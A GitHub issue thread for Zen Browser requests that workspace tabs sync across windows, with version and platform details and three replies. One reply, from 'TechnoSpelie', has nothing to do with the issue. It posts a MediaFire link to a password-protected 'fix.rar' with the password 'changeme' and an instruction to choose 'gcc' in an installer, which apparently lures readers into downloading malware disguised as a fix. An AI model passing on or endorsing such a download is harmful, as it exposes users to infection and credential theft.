### ISSUE TITLE
Sync workspace tabs across windows

### ISSUE THREAD

**Issue by PirateRacham** [zen-browser/desktop#911]
### What happened?

When opening multiple windows of Zen-Browser, the workspaces are available in every window, but only contain tabs in the original window. 

Would be nice if the tabs sync between windows as well.

### Reproducible?

- [X] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.29 (64-bit)

### Severity impact

Low

### What platform are you seeing the problem on?

Windows

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Iziram** [comment]
This should be a discussion topic : https://github.com/zen-browser/desktop/discussions

**Comment by RichardShift** [comment]
For documentation purposes and to help anyone looking for a follow-up on this matter, please see: https://github.com/zen-browser/desktop/issues/7079
